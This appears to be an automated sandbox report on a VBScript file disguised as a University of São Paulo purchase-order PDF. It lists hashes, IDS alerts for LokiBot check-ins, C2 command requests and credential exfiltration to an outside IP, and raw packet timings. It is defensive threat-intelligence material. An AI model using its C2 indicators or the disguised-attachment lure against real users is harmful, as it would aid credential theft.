                                      File name:SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs
                                      File size:80'375 bytes
                                      MD5:8de3bba9fb959d08b3719f1281957c56
                                      SHA1:b8132af0e02ecb58c3c3eb39fe919e3b805106cf
                                      SHA256:c2df6879029285a4edb1e60526812177c3ac1b7293e5b5f05d8250d682641e25
                                      SHA512:8024de858f6d4ec08728944183309650f3f0a7fdc7e83eee53852d00efc37f845ff03bbca42ccd0284282e29c38937a82004bf1b8c3ce439ccc93714fa02f93c
                                      SSDEEP:1536:sUjz/4d4EMT6SUAQZWwGcKQeH+4my6lGiYeJztAxUCDYf:sUjsLAgWO4mF1YhQf
                                      TLSH:1273921FC78405390961C29BEB733D09A47CCCB731924AE8A74906CD9E0267C9E7A97F
                                      File Content Preview:..Rem Omohyoid? stromata? signficance debasingly!..Rem Serbantian? dimers.....Rem Trapperummet smaskede conhydrine! midterfigurernes vav..Rem Zamorine unbalanceable, navnetypes2 kunsthandler? forbiddingness:..Rem Pullers reuter: apperceptionism: effektivi
                                      Icon Hash:68d69b8f86ab9a86
                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2024-10-01T07:43:30.047966+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549714142.250.184.238443TCP
                                      2024-10-01T07:43:34.551355+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549716137.184.191.21580TCP
                                      2024-10-01T07:43:34.551355+02002025381ET MALWARE LokiBot Checkin1192.168.2.549716137.184.191.21580TCP
                                      2024-10-01T07:43:37.245797+02002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.549716137.184.191.21580TCP
                                      2024-10-01T07:43:37.322517+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549717137.184.191.21580TCP
                                      2024-10-01T07:43:37.322517+02002025381ET MALWARE LokiBot Checkin1192.168.2.549717137.184.191.21580TCP
                                      2024-10-01T07:43:40.069355+02002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.549717137.184.191.21580TCP
                                      2024-10-01T07:43:40.185853+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549718137.184.191.21580TCP
                                      2024-10-01T07:43:40.185853+02002025381ET MALWARE LokiBot Checkin1192.168.2.549718137.184.191.21580TCP
                                      2024-10-01T07:43:42.828237+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549718137.184.191.21580TCP
                                      2024-10-01T07:43:42.828237+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549718137.184.191.21580TCP
                                      2024-10-01T07:43:43.003130+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549719137.184.191.21580TCP
                                      2024-10-01T07:43:43.003130+02002025381ET MALWARE LokiBot Checkin1192.168.2.549719137.184.191.21580TCP
                                      2024-10-01T07:43:45.589348+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549719137.184.191.21580TCP
                                      2024-10-01T07:43:45.589348+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549719137.184.191.21580TCP
                                      2024-10-01T07:43:45.741448+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549720137.184.191.21580TCP
                                      2024-10-01T07:43:45.741448+02002025381ET MALWARE LokiBot Checkin1192.168.2.549720137.184.191.21580TCP
                                      2024-10-01T07:43:48.330751+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549720137.184.191.21580TCP
                                      2024-10-01T07:43:48.330751+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549720137.184.191.21580TCP
                                      2024-10-01T07:43:48.572785+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549721137.184.191.21580TCP
                                      2024-10-01T07:43:48.572785+02002025381ET MALWARE LokiBot Checkin1192.168.2.549721137.184.191.21580TCP
                                      2024-10-01T07:43:51.195415+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549721137.184.191.21580TCP
                                      2024-10-01T07:43:51.195415+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549721137.184.191.21580TCP
                                      2024-10-01T07:43:51.351558+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549723137.184.191.21580TCP
                                      2024-10-01T07:43:51.351558+02002025381ET MALWARE LokiBot Checkin1192.168.2.549723137.184.191.21580TCP
                                      2024-10-01T07:43:53.977861+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549723137.184.191.21580TCP
                                      2024-10-01T07:43:53.977861+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549723137.184.191.21580TCP
                                      2024-10-01T07:43:54.132906+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549724137.184.191.21580TCP
                                      2024-10-01T07:43:54.132906+02002025381ET MALWARE LokiBot Checkin1192.168.2.549724137.184.191.21580TCP
                                      2024-10-01T07:43:57.727197+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549724137.184.191.21580TCP
                                      2024-10-01T07:43:57.727197+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549724137.184.191.21580TCP
                                      2024-10-01T07:43:57.879403+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549725137.184.191.21580TCP
                                      2024-10-01T07:43:57.879403+02002025381ET MALWARE LokiBot Checkin1192.168.2.549725137.184.191.21580TCP
                                      2024-10-01T07:44:00.486167+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549725137.184.191.21580TCP
                                      2024-10-01T07:44:00.486167+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549725137.184.191.21580TCP
                                      2024-10-01T07:44:00.649720+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549726137.184.191.21580TCP
                                      2024-10-01T07:44:00.649720+02002025381ET MALWARE LokiBot Checkin1192.168.2.549726137.184.191.21580TCP
                                      2024-10-01T07:44:03.214345+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549726137.184.191.21580TCP
                                      2024-10-01T07:44:03.214345+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549726137.184.191.21580TCP
                                      2024-10-01T07:44:03.369738+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549727137.184.191.21580TCP
                                      2024-10-01T07:44:03.369738+02002025381ET MALWARE LokiBot Checkin1192.168.2.549727137.184.191.21580TCP
                                      2024-10-01T07:44:06.087551+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549727137.184.191.21580TCP
                                      2024-10-01T07:44:06.087551+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549727137.184.191.21580TCP
                                      2024-10-01T07:44:06.239645+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549728137.184.191.21580TCP
                                      2024-10-01T07:44:06.239645+02002025381ET MALWARE LokiBot Checkin1192.168.2.549728137.184.191.21580TCP
                                      2024-10-01T07:44:08.879359+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549728137.184.191.21580TCP
                                      2024-10-01T07:44:08.879359+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549728137.184.191.21580TCP
                                      2024-10-01T07:44:09.041359+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549729137.184.191.21580TCP
                                      2024-10-01T07:44:09.041359+02002025381ET MALWARE LokiBot Checkin1192.168.2.549729137.184.191.21580TCP
                                      2024-10-01T07:44:11.705337+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549729137.184.191.21580TCP
                                      2024-10-01T07:44:11.705337+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549729137.184.191.21580TCP
                                      2024-10-01T07:44:11.889231+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549731137.184.191.21580TCP
                                      2024-10-01T07:44:11.889231+02002025381ET MALWARE LokiBot Checkin1192.168.2.549731137.184.191.21580TCP
                                      2024-10-01T07:44:15.545751+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549731137.184.191.21580TCP
                                      2024-10-01T07:44:15.545751+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549731137.184.191.21580TCP
                                      2024-10-01T07:44:15.693620+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549732137.184.191.21580TCP
                                      2024-10-01T07:44:15.693620+02002025381ET MALWARE LokiBot Checkin1192.168.2.549732137.184.191.21580TCP
                                      2024-10-01T07:44:18.317194+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549732137.184.191.21580TCP
                                      2024-10-01T07:44:18.317194+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549732137.184.191.21580TCP
                                      2024-10-01T07:44:18.475108+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549733137.184.191.21580TCP
                                      2024-10-01T07:44:18.475108+02002025381ET MALWARE LokiBot Checkin1192.168.2.549733137.184.191.21580TCP
                                      2024-10-01T07:44:21.054335+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549733137.184.191.21580TCP
                                      2024-10-01T07:44:21.054335+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549733137.184.191.21580TCP
                                      2024-10-01T07:44:21.209924+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549734137.184.191.21580TCP
                                      2024-10-01T07:44:21.209924+02002025381ET MALWARE LokiBot Checkin1192.168.2.549734137.184.191.21580TCP
                                      2024-10-01T07:44:23.780395+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549734137.184.191.21580TCP
                                      2024-10-01T07:44:23.780395+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549734137.184.191.21580TCP
                                      2024-10-01T07:44:23.931600+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549735137.184.191.21580TCP
                                      2024-10-01T07:44:23.931600+02002025381ET MALWARE LokiBot Checkin1192.168.2.549735137.184.191.21580TCP
                                      2024-10-01T07:44:26.561735+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549735137.184.191.21580TCP
                                      2024-10-01T07:44:26.561735+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549735137.184.191.21580TCP
                                      2024-10-01T07:44:26.709116+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549736137.184.191.21580TCP
                                      2024-10-01T07:44:26.709116+02002025381ET MALWARE LokiBot Checkin1192.168.2.549736137.184.191.21580TCP
                                      2024-10-01T07:44:29.245863+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549736137.184.191.21580TCP
                                      2024-10-01T07:44:29.245863+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549736137.184.191.21580TCP
                                      2024-10-01T07:44:29.403730+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549737137.184.191.21580TCP
                                      2024-10-01T07:44:29.403730+02002025381ET MALWARE LokiBot Checkin1192.168.2.549737137.184.191.21580TCP
                                      2024-10-01T07:44:31.998664+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549737137.184.191.21580TCP
                                      2024-10-01T07:44:31.998664+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549737137.184.191.21580TCP
                                      2024-10-01T07:44:32.156332+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549738137.184.191.21580TCP
                                      2024-10-01T07:44:32.156332+02002025381ET MALWARE LokiBot Checkin1192.168.2.549738137.184.191.21580TCP
                                      2024-10-01T07:44:34.719619+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549738137.184.191.21580TCP
                                      2024-10-01T07:44:34.719619+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549738137.184.191.21580TCP
                                      2024-10-01T07:44:34.894944+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549739137.184.191.21580TCP
                                      2024-10-01T07:44:34.894944+02002025381ET MALWARE LokiBot Checkin1192.168.2.549739137.184.191.21580TCP
                                      2024-10-01T07:44:37.488199+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549739137.184.191.21580TCP
                                      2024-10-01T07:44:37.488199+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549739137.184.191.21580TCP
                                      2024-10-01T07:44:37.656693+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549740137.184.191.21580TCP
                                      2024-10-01T07:44:37.656693+02002025381ET MALWARE LokiBot Checkin1192.168.2.549740137.184.191.21580TCP
                                      2024-10-01T07:44:40.272417+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549740137.184.191.21580TCP
                                      2024-10-01T07:44:40.272417+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549740137.184.191.21580TCP
                                      2024-10-01T07:44:40.680871+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549741137.184.191.21580TCP
                                      2024-10-01T07:44:40.680871+02002025381ET MALWARE LokiBot Checkin1192.168.2.549741137.184.191.21580TCP
                                      2024-10-01T07:44:43.361554+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549741137.184.191.21580TCP
                                      2024-10-01T07:44:43.361554+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549741137.184.191.21580TCP
                                      2024-10-01T07:44:43.545598+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549742137.184.191.21580TCP
                                      2024-10-01T07:44:43.545598+02002025381ET MALWARE LokiBot Checkin1192.168.2.549742137.184.191.21580TCP
                                      2024-10-01T07:44:46.086297+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549742137.184.191.21580TCP
                                      2024-10-01T07:44:46.086297+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549742137.184.191.21580TCP
                                      2024-10-01T07:44:46.240169+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549743137.184.191.21580TCP
                                      2024-10-01T07:44:46.240169+02002025381ET MALWARE LokiBot Checkin1192.168.2.549743137.184.191.21580TCP
                                      2024-10-01T07:44:48.810480+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549743137.184.191.21580TCP
                                      2024-10-01T07:44:48.810480+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549743137.184.191.21580TCP
                                      2024-10-01T07:44:48.957161+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549744137.184.191.21580TCP
                                      2024-10-01T07:44:48.957161+02002025381ET MALWARE LokiBot Checkin1192.168.2.549744137.184.191.21580TCP
                                      2024-10-01T07:44:51.554232+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549744137.184.191.21580TCP
                                      2024-10-01T07:44:51.554232+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549744137.184.191.21580TCP
                                      2024-10-01T07:44:51.716387+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549745137.184.191.21580TCP
                                      2024-10-01T07:44:51.716387+02002025381ET MALWARE LokiBot Checkin1192.168.2.549745137.184.191.21580TCP
                                      2024-10-01T07:44:54.256457+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549745137.184.191.21580TCP
                                      2024-10-01T07:44:54.256457+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549745137.184.191.21580TCP
                                      2024-10-01T07:44:54.419846+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549746137.184.191.21580TCP
                                      2024-10-01T07:44:54.419846+02002025381ET MALWARE LokiBot Checkin1192.168.2.549746137.184.191.21580TCP
                                      2024-10-01T07:44:57.002316+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549746137.184.191.21580TCP
                                      2024-10-01T07:44:57.002316+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549746137.184.191.21580TCP
                                      2024-10-01T07:44:57.163238+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549747137.184.191.21580TCP
                                      2024-10-01T07:44:57.163238+02002025381ET MALWARE LokiBot Checkin1192.168.2.549747137.184.191.21580TCP
                                      2024-10-01T07:44:59.702074+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549747137.184.191.21580TCP
                                      2024-10-01T07:44:59.702074+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549747137.184.191.21580TCP
                                      2024-10-01T07:44:59.847504+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549748137.184.191.21580TCP
                                      2024-10-01T07:44:59.847504+02002025381ET MALWARE LokiBot Checkin1192.168.2.549748137.184.191.21580TCP
                                      2024-10-01T07:45:02.415633+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549748137.184.191.21580TCP
                                      2024-10-01T07:45:02.415633+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549748137.184.191.21580TCP
                                      TimestampSource PortDest PortSource IPDest IP
                                      Oct 1, 2024 07:42:59.277143955 CEST49704443192.168.2.5142.250.184.238
                                      Oct 1, 2024 07:42:59.277179003 CEST44349704142.250.184.238192.168.2.5
                                      Oct 1, 2024 07:42:59.277379990 CEST49704443192.168.2.5142.250.184.238
                                      Oct 1, 2024 07:42:59.284168959 CEST49704443192.168.2.5142.250.184.238
                                      Oct 1, 2024 07:42:59.284189939 CEST44349704142.250.184.238192.168.2.5
                                      Oct 1, 2024 07:42:59.921650887 CEST44349704142.250.184.238192.168.2.5
                                      Oct 1, 2024 07:42:59.921808004 CEST49704443192.168.2.5142.250.184.238
                                      Oct 1, 2024 07:42:59.922785997 CEST44349704142.250.184.238192.168.2.5
                                      Oct 1, 2024 07:42:59.922861099 CEST49704443192.168.2.5142.250.184.238
                                      Oct 1, 2024 07:42:59.926887035 CEST49704443192.168.2.5142.250.184.238
                                      Oct 1, 2024 07:42:59.926892996 CEST44349704142.250.184.238192.168.2.5
                                      Oct 1, 2024 07:42:59.927277088 CEST44349704142.250.184.238192.168.2.5
                                      Oct 1, 2024 07:42:59.940280914 CEST49704443192.168.2.5142.250.184.238
                                      Oct 1, 2024 07:42:59.987399101 CEST44349704142.250.184.238192.168.2.5
                                      Oct 1, 2024 07:43:00.303746939 CEST44349704142.250.184.238192.168.2.5
                                      Oct 1, 2024 07:43:00.303845882 CEST44349704142.250.184.238192.168.2.5
                                      Oct 1, 2024 07:43:00.303893089 CEST49704443192.168.2.5142.250.184.238
                                      Oct 1, 2024 07:43:00.309768915 CEST49704443192.168.2.5142.250.184.238
                                      Oct 1, 2024 07:43:00.319406033 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:00.319458008 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:00.319528103 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:00.319889069 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:00.319899082 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:00.954078913 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:00.954174042 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:00.956835032 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:00.956845999 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:00.957077026 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:00.958220005 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:01.003406048 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.566865921 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.567013025 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.573736906 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.573901892 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.583560944 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.583647013 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.583662033 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.592022896 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.592116117 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.592135906 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.633217096 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.653795958 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.656028986 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.656069994 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.656094074 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.656112909 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.656152010 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.661658049 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.667965889 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.668037891 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.668045044 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.674283028 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.674319983 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.674333096 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.674340010 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.674381018 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.680382013 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.687218904 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.687259912 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.687298059 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.687305927 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.687349081 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.693214893 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.698919058 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.698952913 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.698992014 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.698998928 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.699040890 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.704685926 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.710342884 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.710386038 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.710410118 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.710418940 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.710433006 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.710463047 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.720443964 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.720504045 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.720513105 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.740180016 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.740227938 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.740262032 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.740375996 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.740406990 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.740672112 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.740726948 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.740734100 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.742225885 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.742288113 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.742295027 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.747004986 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.747075081 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.747082949 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.752419949 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.752485991 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.752504110 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.757827997 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.757900953 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.757925987 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.762804985 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.762875080 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.762897015 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.767918110 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.767981052 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.767999887 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.772337914 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.772411108 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.772437096 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.776954889 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.777029037 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.777036905 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.779988050 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.780044079 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.780050993 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.786145926 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.786197901 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.786205053 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.790632010 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.790699959 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.790705919 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.795363903 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.795435905 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.795443058 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.799755096 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.799808979 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.799815893 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.803976059 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.804032087 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.804038048 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.808043003 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.808073997 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.808109045 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.808115959 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.808156013 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.811924934 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.815629959 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.815665960 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.815682888 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.815690994 CEST44349705142.250.184.193192.168.2.5
